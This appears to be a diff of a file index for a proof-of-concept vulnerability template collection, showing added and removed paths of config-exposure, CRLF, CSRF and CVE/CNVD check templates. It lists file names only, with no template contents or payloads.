./poc/config/alibaba-canal-config-leak.yaml @@ -5526,21 +5518,19 @@ ./poc/config/amazon-docker-config-disclosure.yaml ./poc/config/amazon-docker-config.yaml ./poc/config/ansible-config-disclosure-325.yaml -./poc/config/ansible-config-disclosure-326.yaml +./poc/config/ansible-config-disclosure.yaml ./poc/config/apache-config-343.yaml +./poc/config/apache-config-344.yaml ./poc/config/apache-config-exposure.yaml ./poc/config/apache-config-plain-password.yaml -./poc/config/apache-config.yaml ./poc/config/apache-httpd-conf-disclosure.yaml ./poc/config/apache-httpd-conf-exposure.yml -./poc/config/api-iconfinder-439.yaml -./poc/config/api-iconfinder.yaml +./poc/config/api-iconfinder-438.yaml ./poc/config/aws-config-not-enabled.yaml ./poc/config/aws-s3-misconfig.yaml ./poc/config/awstats-config-1.yaml ./poc/config/awstats-config-2.yaml ./poc/config/awstats-config-655.yaml -./poc/config/awstats-config-656.yaml ./poc/config/azure-pipelines-config-disclosure.yaml ./poc/config/basic-cors-misconfig.yaml ./poc/config/bigip-config-utility-detect-1.yaml @@ -5548,11 +5538,9 @@ ./poc/config/bigip-config-utility-detect-3.yaml ./poc/config/bigip-config-utility-detect-730.yaml ./poc/config/bigip-config-utility-detect-731.yaml -./poc/config/bigip-config-utility-detect-733.yaml ./poc/config/bigip-config-utility-detect.yaml ./poc/config/buffalo-config-injection-798.yaml ./poc/config/buffalo-config-injection-799.yaml -./poc/config/buffalo-config-injection-800.yaml ./poc/config/buffalo-config-injection.yaml ./poc/config/cache-control-header-misconfiguration.yaml ./poc/config/child-theme-configurator.yaml @@ -5584,6 +5572,7 @@ ./poc/config/config-js.yaml ./poc/config/config-parameters-yml.yaml ./poc/config/config-properties.yaml +./poc/config/config-rb-1179.yaml ./poc/config/config-rb-1180.yaml ./poc/config/config.php.new.yaml ./poc/config/config.yaml @@ -5592,7 +5581,6 @@ ./poc/config/configurable-tag-cloud-widget-ca276d47d9ec19544f581dbe03805651.yaml ./poc/config/configurable-tag-cloud-widget.yaml ./poc/config/configuration-listing-1181.yaml -./poc/config/configuration-listing-1182.yaml ./poc/config/configuration-listing-1183.yaml ./poc/config/configuration-listing-1184.yaml ./poc/config/configuration-listing-1185.yaml @@ -5614,14 +5602,14 @@ ./poc/config/confluence-dashboard.yaml ./poc/config/confluence-detect-1.yaml ./poc/config/confluence-detect-1186.yaml -./poc/config/confluence-detect-1188.yaml +./poc/config/confluence-detect-1187.yaml ./poc/config/confluence-detect-1189.yaml ./poc/config/confluence-detect-2.yaml ./poc/config/confluence-detect-3.yaml ./poc/config/confluence-detect-4.yaml ./poc/config/confluence-detect.yaml +./poc/config/confluence-ssrf-sharelinks-1190.yaml ./poc/config/confluence-ssrf-sharelinks-1191.yaml -./poc/config/confluence-ssrf-sharelinks-1192.yaml ./poc/config/confluence-ssrf-sharelinks-1193.yaml ./poc/config/confluence-ssrf-sharelinks-1194.yaml ./poc/config/confluence-workflow-1195.yaml @@ -5632,13 +5620,13 @@ ./poc/config/conftool.yaml ./poc/config/coop-misconfig.yaml ./poc/config/coremail-config-disclosure-1213.yaml +./poc/config/coremail-config-disclosure-1214.yaml ./poc/config/coremail-config-disclosure-1215.yaml -./poc/config/coremail-config-disclosure-1216.yaml ./poc/config/coremail-config-disclosure.yaml -./poc/config/cors-misconfig-1221.yaml ./poc/config/cors-misconfig-1222.yaml ./poc/config/cors-misconfig-1223.yaml ./poc/config/cors-misconfig-1224.yaml +./poc/config/cors-misconfig.yaml ./poc/config/default-config-6835.yaml ./poc/config/default-config.yaml ./poc/config/detect-drone-config-6971.yaml @@ -5661,7 +5649,6 @@ ./poc/config/docker-misconfigured-api.yaml ./poc/config/dockercfg-config-1.yaml ./poc/config/dockercfg-config-2.yaml -./poc/config/dockercfg-config-7055.yaml ./poc/config/dockercfg-config-7056.yaml ./poc/config/dockerrun-aws-config-page.yaml ./poc/config/dompdf-config.yaml @@ -5692,8 +5679,6 @@ ./poc/config/firebase-config-exposure-7485.yaml ./poc/config/firebase-config-exposure-7486.yaml ./poc/config/firebase-config-exposure-7487.yaml -./poc/config/firebase-config-exposure-7488.yaml -./poc/config/firebase-config-exposure.yaml ./poc/config/firebase-config-file.yaml ./poc/config/firebase-config.yaml ./poc/config/fps-config.yaml @@ -5701,17 +5686,15 @@ ./poc/config/front-page-misconfig-2.yaml ./poc/config/front-page-misconfig-7545.yaml ./poc/config/front-page-misconfig-7546.yaml -./poc/config/front-page-misconfig-7547.yaml ./poc/config/front-page-misconfig-7550.yaml ./poc/config/front-page-misconfig.yaml ./poc/config/ftpconfig-7565.yaml -./poc/config/ftpconfig-7566.yaml ./poc/config/gcs-misconfig.yaml ./poc/config/git-config-7633.yaml ./poc/config/git-config-7634.yaml +./poc/config/git-config-7635.yaml ./poc/config/git-config-7636.yaml ./poc/config/git-config-7637.yaml -./poc/config/git-config-7638.yaml ./poc/config/git-config-crendentials.yaml ./poc/config/git-config-exposure.yaml ./poc/config/git-config-nginxoffbyslash-1.yaml @@ -5721,6 +5704,7 @@ ./poc/config/git-config-nginxoffbyslash-5.yaml ./poc/config/git-config-nginxoffbyslash-6.yaml ./poc/config/git-config-nginxoffbyslash-7.yaml +./poc/config/git-config-nginxoffbyslash-7629.yaml ./poc/config/git-config-nginxoffbyslash-7630.yaml ./poc/config/git-config-nginxoffbyslash-7631.yaml ./poc/config/git-config-nginxoffbyslash-7632.yaml @@ -5728,13 +5712,13 @@ ./poc/config/git-config-nginxoffbyslash-9.yaml ./poc/config/git-config-nginxoffbyslash.yaml ./poc/config/git-config.yaml +./poc/config/github-page-config-7654.yaml ./poc/config/github-page-config-7655.yaml ./poc/config/github-page-config-7656.yaml ./poc/config/gitlab-config-exposure.yml ./poc/config/glpi-fusioninventory-misconfig.yaml ./poc/config/gocd-cruise-configuration-7746.yaml ./poc/config/gocd-cruise-configuration-7747.yaml -./poc/config/gocd-cruise-configuration-7748.yaml ./poc/config/gocd-cruise-configuration.yaml ./poc/config/grafana-exposed-configuration.yaml ./poc/config/grandstream-device-configuration.yaml @@ -5748,10 +5732,11 @@ ./poc/config/honeywell-scada-config-7989.yaml ./poc/config/honeywell-scada-config-7990.yaml ./poc/config/honeywell-scada-config-7991.yaml +./poc/config/htaccess-config-8042.yaml ./poc/config/htaccess-config-8043.yaml ./poc/config/htaccess-config.yaml ./poc/config/httpd-config-8054.yaml -./poc/config/httpd-config.yaml +./poc/config/httpd-config-8055.yaml ./poc/config/huace-Config-infoLeak.yaml ./poc/config/huace-mews-config-xml-infoleak.yaml ./poc/config/huiwen-book-config-properties-info-leak.yaml @@ -5761,7 +5746,6 @@ ./poc/config/joomla-config-dist-file.yaml ./poc/config/joomla-config-file-8374.yaml ./poc/config/joomla-config-file-8375.yaml -./poc/config/joomla-config-file-8376.yaml ./poc/config/joomla-config-file-8377.yaml ./poc/config/joomla-sensitive-config.yaml ./poc/config/jsconfig-json.yaml @@ -5780,27 +5764,26 @@ ./poc/config/magento-config-2.yaml ./poc/config/magento-config-8700.yaml ./poc/config/magento-config-8701.yaml -./poc/config/magento-config-8702.yaml ./poc/config/magento-config-8703.yaml +./poc/config/magento-config-disclosure.yaml ./poc/config/magento-config.yaml ./poc/config/manageengine-network-config.yaml ./poc/config/misconfig.yaml ./poc/config/misconfigured-concrete5.yaml +./poc/config/misconfigured-docker-8900.yaml ./poc/config/misconfigured-docker-8901.yaml -./poc/config/misconfigured-docker-8902.yaml ./poc/config/misconfigured-docker.yaml ./poc/config/misconfigured-redis.yaml +./poc/config/msmtp-config-8966.yaml ./poc/config/msmtp-config-8967.yaml -./poc/config/msmtp-config.yaml ./poc/config/nconf-panel.yaml ./poc/config/nexus-repo-config-exposure.yml ./poc/config/nexus-repository-exposed-configuration.yaml ./poc/config/nginx-conf-exposed.yaml ./poc/config/nginx-config-9096.yaml -./poc/config/nginx-config-9098.yaml +./poc/config/nginx-config-9097.yaml ./poc/config/nginx-config-9099.yaml ./poc/config/nginx-config-exposure.yaml -./poc/config/nginx-config.yaml ./poc/config/nginx_Misconfiguration.yaml ./poc/config/nuclei_esConfig.yaml ./poc/config/om-video-conferencing.yaml @@ -5811,19 +5794,18 @@ ./poc/config/oracle-ebs-config-disclosure.yaml ./poc/config/owncloud-config-9419.yaml ./poc/config/owncloud-config.yaml -./poc/config/parameters-config-9465.yaml +./poc/config/parameters-config.yaml ./poc/config/phinx-config.yaml ./poc/config/php-fpm-config-9513.yaml ./poc/config/php-fpm-config.yaml -./poc/config/phpmyadmin-misconfiguration.yaml ./poc/config/pipeline-config-exposure.yaml ./poc/config/poc-yaml-Confluence-ognl-rce.yaml ./poc/config/proftpd-config-9666.yaml ./poc/config/proftpd-config-9667.yaml -./poc/config/prometheus-config-9673.yaml ./poc/config/prometheus-config-endpoint-9671.yaml ./poc/config/prometheus-config-endpoint-9672.yaml ./poc/config/prometheus-config-endpoint.yaml +./poc/config/prometheus-config.yaml ./poc/config/publish-confirm-message-be37091b7b8e5fc7583cd9ff3bba3042.yaml ./poc/config/publish-confirm-message.yaml ./poc/config/rabbitmq-config-exposure.yml @@ -5862,19 +5844,17 @@ ./poc/config/springboot-autoconfig-2.yaml ./poc/config/springboot-configprops-1.yaml ./poc/config/springboot-configprops-10442.yaml -./poc/config/springboot-configprops-10443.yaml ./poc/config/springboot-configprops-10444.yaml +./poc/config/springboot-configprops-10445.yaml ./poc/config/springboot-configprops-2.yaml -./poc/config/springboot-configprops.yaml ./poc/config/sshd-config-disclosure.yaml ./poc/config/ssrf-via-oauth-misconfig-10525.yaml -./poc/config/ssrf-via-oauth-misconfig-10526.yaml ./poc/config/ssrf-via-oauth-misconfig-10527.yaml ./poc/config/svnserve-config-10589.yaml ./poc/config/svnserve-config-10590.yaml ./poc/config/symfony-database-config-10614.yaml -./poc/config/symfony-database-config-10615.yaml ./poc/config/symfony-database-config-10616.yaml +./poc/config/symfony-database-config-10617.yaml ./poc/config/symfony-database-config.yaml ./poc/config/symfony-security-config-1.yaml ./poc/config/symfony-security-config-2.yaml @@ -5889,9 +5869,9 @@ ./poc/config/the-conference.yaml ./poc/config/truffle-config-exposure.yaml ./poc/config/tugboat-config-exposure-10841.yaml +./poc/config/tugboat-config-exposure-10842.yaml ./poc/config/tugboat-config-exposure-10843.yaml ./poc/config/tugboat-config-exposure-10844.yaml -./poc/config/tugboat-config-exposure.yaml ./poc/config/unconfirmed-abc400f143f0254b15b00169f8369d29.yaml ./poc/config/unconfirmed.yaml ./poc/config/v2-video-conferencing.yaml @@ -5924,7 +5904,8 @@ ./poc/config/videowhisper-video-conference-integration.yaml ./poc/config/wamp-server-configuration-11096.yaml ./poc/config/wamp-server-configuration-11097.yaml -./poc/config/wamp-server-configuration.yaml +./poc/config/wamp-server-configuration-11098.yaml +./poc/config/wamp-server-configuration-11099.yaml ./poc/config/wanhu-ezoffice-teleconferenceservice-xxe.yaml ./poc/config/wanhu-oa-tele-conference-service-xxe.yaml ./poc/config/web-config-11123.yaml @@ -5975,7 +5956,6 @@ ./poc/config/wordpress-accessible-wpconfig.yaml ./poc/config/wordpress-config-disclosure.yaml ./poc/config/wordpress-git-config-1.yaml -./poc/config/wordpress-git-config-11278.yaml ./poc/config/wordpress-git-config-11279.yaml ./poc/config/wordpress-git-config-2.yaml ./poc/config/wordpress-misconfig.yaml @@ -6019,7 +5999,6 @@ ./poc/crlf_injection/crlf-injection-1.yaml ./poc/crlf_injection/crlf-injection-1260.yaml ./poc/crlf_injection/crlf-injection-1261.yaml -./poc/crlf_injection/crlf-injection-1262.yaml ./poc/crlf_injection/crlf-injection-1263.yaml ./poc/crlf_injection/crlf-injection-1264.yaml ./poc/crlf_injection/crlf-injection-1265.yaml @@ -6038,6 +6017,7 @@ ./poc/crlf_injection/viewlinc-crlf-injection-11012.yaml ./poc/crlf_injection/viewlinc-crlf-injection-11013.yaml ./poc/crlf_injection/viewlinc-crlf-injection-11014.yaml +./poc/crlf_injection/viewlinc-crlf-injection-11015.yaml ./poc/crlf_injection/viewlinc-crlf-injection.yaml ./poc/cross_site_request_forgery/WBCE CMS 1.6.1 - Open Redirect & CSRF.yaml ./poc/cross_site_request_forgery/csrf token leak.yaml @@ -6048,8 +6028,8 @@ ./poc/cross_site_request_forgery/csrf-token-missing.yaml ./poc/cross_site_request_forgery/csrf.yaml ./poc/cross_site_request_forgery/csrf2.yaml +./poc/cross_site_request_forgery/csrfguard-detect-1290.yaml ./poc/cross_site_request_forgery/csrfguard-detect-1291.yaml -./poc/cross_site_request_forgery/csrfguard-detect.yaml ./poc/cross_site_request_forgery/django-debug-exposure-csrf.yaml ./poc/cross_site_request_forgery/drupal_module-cloud-csrf.yaml ./poc/cross_site_request_forgery/hidden-csrf-token.yaml @@ -6161,6 +6141,7 @@ ./poc/cve/CNVD-2023-08743.yaml ./poc/cve/CVE-2000-0114.yaml ./poc/cve/CVE-2001-0537.yaml +./poc/cve/CVE-2001-1473.yaml ./poc/cve/CVE-2002-1131.yaml ./poc/cve/CVE-2003-1598-35d1ba838509380abcf47521aad3fd3f.yaml ./poc/cve/CVE-2003-1598.yaml @@ -11489,6 +11470,7 @@ ./poc/cve/CVE-2019-10869-cb3e4dea9ed219ec7d5f976b3962c355.yaml ./poc/cve/CVE-2019-10869.yaml ./poc/cve/CVE-2019-11013.yaml +./poc/cve/CVE-2019-11043 (copy 2).yaml ./poc/cve/CVE-2019-11043 2.yaml ./poc/cve/CVE-2019-11043.yaml ./poc/cve/CVE-2019-11185-9bdfa57b2b25bb0c2c4bd09be3aacfa0.yaml @@ -12397,7 +12379,6 @@ ./poc/cve/CVE-2019-9978.yaml ./poc/cve/CVE-2020-0618.yaml ./poc/cve/CVE-2020-0646.yaml -./poc/cve/CVE-2020-10124 (copy 1).yaml ./poc/cve/CVE-2020-10124.yaml ./poc/cve/CVE-2020-10148 (copy 2).yaml ./poc/cve/CVE-2020-10148.yaml @@ -17188,7 +17169,6 @@ ./poc/cve/CVE-2022-0919.yaml ./poc/cve/CVE-2022-0920-a3427aad6ed07b9d0cef564d7db0125c.yaml ./poc/cve/CVE-2022-0920.yaml -./poc/cve/CVE-2022-0921.yaml ./poc/cve/CVE-2022-0928.yaml ./poc/cve/CVE-2022-0948-99020965bb89f1929411392421aa5e11.yaml ./poc/cve/CVE-2022-0948.yaml @@ -23438,7 +23418,6 @@ ./poc/cve/CVE-2023-2517.yaml ./poc/cve/CVE-2023-2518-ae15f8d2f14953fb17f25aff5f80865f.yaml ./poc/cve/CVE-2023-2518.yaml -./poc/cve/CVE-2023-25194.yaml ./poc/cve/CVE-2023-2523.yaml ./poc/cve/CVE-2023-2526-1f9ffdfe6031f210b4eec4a4d860af25.yaml ./poc/cve/CVE-2023-2526.yaml @@ -27382,6 +27361,7 @@ ./poc/cve/CVE-2023-46313.yaml ./poc/cve/CVE-2023-4634-9edc3a00b0023a5ec3bda847366dcd61.yaml ./poc/cve/CVE-2023-4634.yaml +./poc/cve/CVE-2023-46347.yaml ./poc/cve/CVE-2023-4635-4152ff680e3231d03f3f7037df6f7b26.yaml ./poc/cve/CVE-2023-4635.yaml ./poc/cve/CVE-2023-4636-14ce0bb41108bf7249023301c7a543d5.yaml @@ -35286,8 +35266,17 @@ ./poc/cve/CVE-2024-3477.yaml ./poc/cve/CVE-2024-3478-f1b1672a851a069e48120221fa992476.yaml ./poc/cve/CVE-2024-3478.yaml +./poc/cve/CVE-2024-34806-40fde82d1139f989e39d48eddd554635.yaml +./poc/cve/CVE-2024-34807-7e051c12a79d7f4329c3d9b7e4fdacfd.yaml +./poc/cve/CVE-2024-34809-dddae04151585005a9285f1a02b22161.yaml ./poc/cve/CVE-2024-3481-49784a2ddc86deff991718ed885cefce.yaml ./poc/cve/CVE-2024-3481.yaml +./poc/cve/CVE-2024-34810-52ded3773100cd661c984e26252f0f18.yaml +./poc/cve/CVE-2024-34810-545189449c80833a6aa1acdfc9039bc6.yaml +./poc/cve/CVE-2024-34810-84427bd3d436bdd8e69b473e832df371.yaml +./poc/cve/CVE-2024-34810-8a45862d2b156312144f2dc87943ad0e.yaml +./poc/cve/CVE-2024-34810-962705bdc095fcff06e564550f8fbb7c.yaml +./poc/cve/CVE-2024-34810-aaf051cca83087331c0284fa66b851c3.yaml ./poc/cve/CVE-2024-34811-7a4706f0cf6c13dec0d46774f776a87e.yaml ./poc/cve/CVE-2024-34811.yaml ./poc/cve/CVE-2024-34812-9632dfb5e44c16470ec4d4550eb0b763.yaml @@ -35925,28 +35914,28 @@ ./poc/cve/cnvd-2018-13393-1039.yaml ./poc/cve/cnvd-2019-01348-1040.yaml ./poc/cve/cnvd-2019-01348-1041.yaml +./poc/cve/cnvd-2019-01348-1042.yaml ./poc/cve/cnvd-2019-01348-1043.yaml -./poc/cve/cnvd-2019-01348-1044.yaml ./poc/cve/cnvd-2019-01348-1045.yaml ./poc/cve/cnvd-2019-06255-1046.yaml ./poc/cve/cnvd-2019-06255-1047.yaml -./poc/cve/cnvd-2019-06255-1049.yaml +./poc/cve/cnvd-2019-06255-1048.yaml ./poc/cve/cnvd-2019-06255-1050.yaml +./poc/cve/cnvd-2019-19299-1051.yaml ./poc/cve/cnvd-2019-19299-1052.yaml -./poc/cve/cnvd-2019-32204-1054.yaml +./poc/cve/cnvd-2019-32204-1053.yaml ./poc/cve/cnvd-2020-23735-1055.yaml ./poc/cve/cnvd-2020-23735-1056.yaml ./poc/cve/cnvd-2020-23735-1058.yaml ./poc/cve/cnvd-2020-23735-1059.yaml ./poc/cve/cnvd-2020-46552-1060.yaml ./poc/cve/cnvd-2020-46552.yaml -./poc/cve/cnvd-2020-56167-1061.yaml ./poc/cve/cnvd-2020-56167-1062.yaml ./poc/cve/cnvd-2020-56167-1063.yaml ./poc/cve/cnvd-2020-56167-1064.yaml +./poc/cve/cnvd-2020-62422-1065.yaml ./poc/cve/cnvd-2020-62422-1066.yaml ./poc/cve/cnvd-2020-62422-1067.yaml -./poc/cve/cnvd-2020-62422-1068.yaml ./poc/cve/cnvd-2020-62422-1069.yaml ./poc/cve/cnvd-2020-67113-1071.yaml ./poc/cve/cnvd-2020-67113-1072.yaml @@ -35954,39 +35943,36 @@ ./poc/cve/cnvd-2020-68596-1074.yaml ./poc/cve/cnvd-2020-68596-1075.yaml ./poc/cve/cnvd-2020-68596-1076.yaml -./poc/cve/cnvd-2021-01931-1077.yaml +./poc/cve/cnvd-2021-01931-1078.yaml ./poc/cve/cnvd-2021-01931-1079.yaml ./poc/cve/cnvd-2021-09650-1081.yaml ./poc/cve/cnvd-2021-10543-1082.yaml ./poc/cve/cnvd-2021-10543-1083.yaml -./poc/cve/cnvd-2021-10543-1084.yaml ./poc/cve/cnvd-2021-10543-1085.yaml ./poc/cve/cnvd-2021-10543-1086.yaml ./poc/cve/cnvd-2021-14536-1087.yaml ./poc/cve/cnvd-2021-15822-1089.yaml -./poc/cve/cnvd-2021-15822-1090.yaml ./poc/cve/cnvd-2021-15822-1091.yaml +./poc/cve/cnvd-2021-15822-1092.yaml ./poc/cve/cnvd-2021-15822-1093.yaml ./poc/cve/cnvd-2021-15822-1094.yaml ./poc/cve/cnvd-2021-15822-1095.yaml ./poc/cve/cnvd-2021-15824-1096.yaml +./poc/cve/cnvd-2021-17369-1098.yaml ./poc/cve/cnvd-2021-17369-1099.yaml -./poc/cve/cnvd-2021-17369-1100.yaml ./poc/cve/cnvd-2021-17369-1101.yaml ./poc/cve/cnvd-2021-17369-1102.yaml ./poc/cve/cnvd-2021-26422-1103.yaml -./poc/cve/cnvd-2021-26422-1104.yaml ./poc/cve/cnvd-2021-28277-1105.yaml ./poc/cve/cnvd-2021-28277-1106.yaml ./poc/cve/cnvd-2021-28277-1107.yaml ./poc/cve/cnvd-2021-30167-1108.yaml ./poc/cve/cnvd-2021-30167-1109.yaml -./poc/cve/cnvd-2021-30167-1110.yaml ./poc/cve/cnvd-2021-30167-1111.yaml ./poc/cve/cnvd-2021-30167-1112.yaml -./poc/cve/cnvd-2021-49104-1114.yaml +./poc/cve/cnvd-2021-49104-1113.yaml ./poc/cve/cnvd-2021-49104-1115.yaml -./poc/cve/cnvd-2022-03672-1117.yaml +./poc/cve/cnvd-2022-03672-1116.yaml ./poc/cve/coldfusion-cve-2010-2861-lfi.yml ./poc/cve/confluence-cve-2015-8399.yml ./poc/cve/confluence-cve-2019-3396-lfi.yaml @@ -35999,13 +35985,15 @@ ./poc/cve/craftcms-seomatic-cve-2020-9757-rce.yml ./poc/cve/cve-2000-0114-1295.yaml ./poc/cve/cve-2000-0114-1296.yaml +./poc/cve/cve-2000-0114-1297.yaml ./poc/cve/cve-2001-1473-1298.yaml ./poc/cve/cve-2001-1473-1299.yaml ./poc/cve/cve-2001-1473-1300.yaml -./poc/cve/cve-2001-1473.yaml ./poc/cve/cve-2002-1131-1301.yaml ./poc/cve/cve-2002-1131-1302.yaml ./poc/cve/cve-2002-1131-1303.yaml +./poc/cve/cve-2002-1131-1304.yaml +./poc/cve/cve-2004-0519-1305.yaml ./poc/cve/cve-2004-0519-1306.yaml ./poc/cve/cve-2004-0519-1307.yaml ./poc/cve/cve-2004-0519-1308.yaml @@ -36044,6 +36032,7 @@ ./poc/cve/cve-2007-4504-1340.yaml ./poc/cve/cve-2007-4504-1341.yaml ./poc/cve/cve-2007-4504-1342.yaml +./poc/cve/cve-2007-4504.yaml ./poc/cve/cve-2007-4556-1343.yaml ./poc/cve/cve-2007-4556-1344.yaml ./poc/cve/cve-2007-4556-1345.yaml @@ -36065,11 +36054,13 @@ ./poc/cve/cve-2008-2650-1361.yaml ./poc/cve/cve-2008-2650-1362.yaml ./poc/cve/cve-2008-2650-1363.yaml +./poc/cve/cve-2008-4668-1364.yaml ./poc/cve/cve-2008-4668-1365.yaml ./poc/cve/cve-2008-4668-1366.yaml ./poc/cve/cve-2008-4668-1367.yaml ./poc/cve/cve-2008-4668-1368.yaml ./poc/cve/cve-2008-4668-1369.yaml +./poc/cve/cve-2008-4668.yaml ./poc/cve/cve-2008-4764-1370.yaml ./poc/cve/cve-2008-4764-1371.yaml ./poc/cve/cve-2008-4764-1372.yaml @@ -36093,7 +36084,6 @@ ./poc/cve/cve-2008-6172-1389.yaml ./poc/cve/cve-2008-6172-1390.yaml ./poc/cve/cve-2008-6172-1391.yaml -./poc/cve/cve-2008-6172.yaml ./poc/cve/cve-2008-6222-1392.yaml ./poc/cve/cve-2008-6222-1393.yaml ./poc/cve/cve-2008-6222-1394.yaml @@ -36111,7 +36101,6 @@ ./poc/cve/cve-2009-0545-1405.yaml ./poc/cve/cve-2009-0545-1406.yaml ./poc/cve/cve-2009-0545-1407.yaml -./poc/cve/cve-2009-0545.yaml ./poc/cve/cve-2009-0932-1408.yaml ./poc/cve/cve-2009-0932-1409.yaml ./poc/cve/cve-2009-0932-1410.yaml @@ -36129,8 +36118,8 @@ ./poc/cve/cve-2009-1496-1422.yaml ./poc/cve/cve-2009-1496-1423.yaml ./poc/cve/cve-2009-1496-1424.yaml -./poc/cve/cve-2009-1496.yaml ./poc/cve/cve-2009-1558-1425.yaml +./poc/cve/cve-2009-1558-1426.yaml ./poc/cve/cve-2009-1558-1427.yaml ./poc/cve/cve-2009-1558-1428.yaml ./poc/cve/cve-2009-1558-1429.yaml @@ -36187,7 +36176,6 @@ ./poc/cve/cve-2009-5114-1482.yaml ./poc/cve/cve-2009-5114-1483.yaml ./poc/cve/cve-2009-5114-1484.yaml -./poc/cve/cve-2010-0157-1485.yaml ./poc/cve/cve-2010-0157-1486.yaml ./poc/cve/cve-2010-0157-1487.yaml ./poc/cve/cve-2010-0157-1488.yaml @@ -36197,10 +36185,8 @@ ./poc/cve/cve-2010-0467-1492.yaml ./poc/cve/cve-2010-0467-1493.yaml ./poc/cve/cve-2010-0467-1494.yaml -./poc/cve/cve-2010-0467-1495.yaml ./poc/cve/cve-2010-0467-1496.yaml ./poc/cve/cve-2010-0696-1497.yaml -./poc/cve/cve-2010-0696-1498.yaml ./poc/cve/cve-2010-0696-1499.yaml ./poc/cve/cve-2010-0696-1500.yaml ./poc/cve/cve-2010-0696-1501.yaml @@ -36248,22 +36234,21 @@ ./poc/cve/cve-2010-1056-1540.yaml ./poc/cve/cve-2010-1056-1541.yaml ./poc/cve/cve-2010-1056-1542.yaml +./poc/cve/cve-2010-1056-1543.yaml ./poc/cve/cve-2010-1056-1544.yaml +./poc/cve/cve-2010-1056.yaml ./poc/cve/cve-2010-1081-1545.yaml ./poc/cve/cve-2010-1081-1546.yaml ./poc/cve/cve-2010-1081-1547.yaml ./poc/cve/cve-2010-1081-1548.yaml ./poc/cve/cve-2010-1081-1549.yaml ./poc/cve/cve-2010-1081-1550.yaml -./poc/cve/cve-2010-1081.yaml ./poc/cve/cve-2010-1217-1551.yaml ./poc/cve/cve-2010-1217-1552.yaml ./poc/cve/cve-2010-1217-1553.yaml ./poc/cve/cve-2010-1217-1554.yaml ./poc/cve/cve-2010-1217-1555.yaml -./poc/cve/cve-2010-1217.yaml ./poc/cve/cve-2010-1219-1556.yaml -./poc/cve/cve-2010-1219-1557.yaml ./poc/cve/cve-2010-1219-1558.yaml ./poc/cve/cve-2010-1219-1559.yaml ./poc/cve/cve-2010-1219-1560.yaml @@ -36274,7 +36259,6 @@ ./poc/cve/cve-2010-1302-1565.yaml ./poc/cve/cve-2010-1302-1566.yaml ./poc/cve/cve-2010-1302-1567.yaml -./poc/cve/cve-2010-1302.yaml ./poc/cve/cve-2010-1304-1568.yaml ./poc/cve/cve-2010-1304-1569.yaml ./poc/cve/cve-2010-1304-1570.yaml @@ -36303,6 +36287,7 @@ ./poc/cve/cve-2010-1308-1591.yaml ./poc/cve/cve-2010-1308-1592.yaml ./poc/cve/cve-2010-1308-1593.yaml +./poc/cve/cve-2010-1308.yaml ./poc/cve/cve-2010-1312-1594.yaml ./poc/cve/cve-2010-1312-1595.yaml ./poc/cve/cve-2010-1312-1596.yaml @@ -36312,13 +36297,12 @@ ./poc/cve/cve-2010-1313-1601.yaml ./poc/cve/cve-2010-1313-1602.yaml ./poc/cve/cve-2010-1313-1603.yaml +./poc/cve/cve-2010-1313-1604.yaml ./poc/cve/cve-2010-1314-1605.yaml ./poc/cve/cve-2010-1314-1606.yaml ./poc/cve/cve-2010-1314-1607.yaml ./poc/cve/cve-2010-1314-1608.yaml ./poc/cve/cve-2010-1314-1609.yaml -./poc/cve/cve-2010-1314.yaml -./poc/cve/cve-2010-1315-1610.yaml ./poc/cve/cve-2010-1315-1611.yaml ./poc/cve/cve-2010-1315-1612.yaml ./poc/cve/cve-2010-1315-1613.yaml @@ -36329,14 +36313,17 @@ ./poc/cve/cve-2010-1340-1618.yaml ./poc/cve/cve-2010-1340-1619.yaml ./poc/cve/cve-2010-1345-1620.yaml +./poc/cve/cve-2010-1345-1621.yaml ./poc/cve/cve-2010-1345-1622.yaml ./poc/cve/cve-2010-1345-1623.yaml ./poc/cve/cve-2010-1345-1624.yaml +./poc/cve/cve-2010-1345.yaml ./poc/cve/cve-2010-1352-1625.yaml ./poc/cve/cve-2010-1352-1626.yaml ./poc/cve/cve-2010-1352-1627.yaml ./poc/cve/cve-2010-1352-1628.yaml ./poc/cve/cve-2010-1352-1629.yaml +./poc/cve/cve-2010-1352.yaml ./poc/cve/cve-2010-1353-1630.yaml ./poc/cve/cve-2010-1353-1631.yaml ./poc/cve/cve-2010-1353-1632.yaml @@ -36378,12 +36365,10 @@ ./poc/cve/cve-2010-1473-1665.yaml ./poc/cve/cve-2010-1473-1666.yaml ./poc/cve/cve-2010-1473-1667.yaml -./poc/cve/cve-2010-1473-1668.yaml ./poc/cve/cve-2010-1474-1669.yaml ./poc/cve/cve-2010-1474-1670.yaml ./poc/cve/cve-2010-1474-1671.yaml ./poc/cve/cve-2010-1474-1672.yaml -./poc/cve/cve-2010-1474-1673.yaml ./poc/cve/cve-2010-1475-1674.yaml ./poc/cve/cve-2010-1475-1675.yaml ./poc/cve/cve-2010-1475-1676.yaml @@ -36405,7 +36390,9 @@ ./poc/cve/cve-2010-1491-1689.yaml ./poc/cve/cve-2010-1491-1690.yaml ./poc/cve/cve-2010-1491-1691.yaml +./poc/cve/cve-2010-1491-1692.yaml ./poc/cve/cve-2010-1491-1693.yaml +./poc/cve/cve-2010-1491.yaml ./poc/cve/cve-2010-1494-1694.yaml ./poc/cve/cve-2010-1494-1695.yaml ./poc/cve/cve-2010-1494-1696.yaml @@ -36426,6 +36413,7 @@ ./poc/cve/cve-2010-1532-1710.yaml ./poc/cve/cve-2010-1532-1711.yaml ./poc/cve/cve-2010-1532-1712.yaml +./poc/cve/cve-2010-1532.yaml ./poc/cve/cve-2010-1533-1713.yaml ./poc/cve/cve-2010-1533-1714.yaml ./poc/cve/cve-2010-1533-1715.yaml @@ -36437,13 +36425,11 @@ ./poc/cve/cve-2010-1534-1721.yaml ./poc/cve/cve-2010-1534-1722.yaml ./poc/cve/cve-2010-1534-1723.yaml -./poc/cve/cve-2010-1534.yaml ./poc/cve/cve-2010-1535-1724.yaml ./poc/cve/cve-2010-1535-1725.yaml ./poc/cve/cve-2010-1535-1726.yaml ./poc/cve/cve-2010-1535-1727.yaml ./poc/cve/cve-2010-1535-1728.yaml -./poc/cve/cve-2010-1540-1729.yaml ./poc/cve/cve-2010-1540-1730.yaml ./poc/cve/cve-2010-1540-1731.yaml ./poc/cve/cve-2010-1540-1732.yaml @@ -36487,13 +36473,11 @@ ./poc/cve/cve-2010-1658-1767.yaml ./poc/cve/cve-2010-1658-1768.yaml ./poc/cve/cve-2010-1658-1769.yaml -./poc/cve/cve-2010-1658.yaml ./poc/cve/cve-2010-1659-1770.yaml ./poc/cve/cve-2010-1659-1771.yaml ./poc/cve/cve-2010-1659-1772.yaml ./poc/cve/cve-2010-1659-1773.yaml 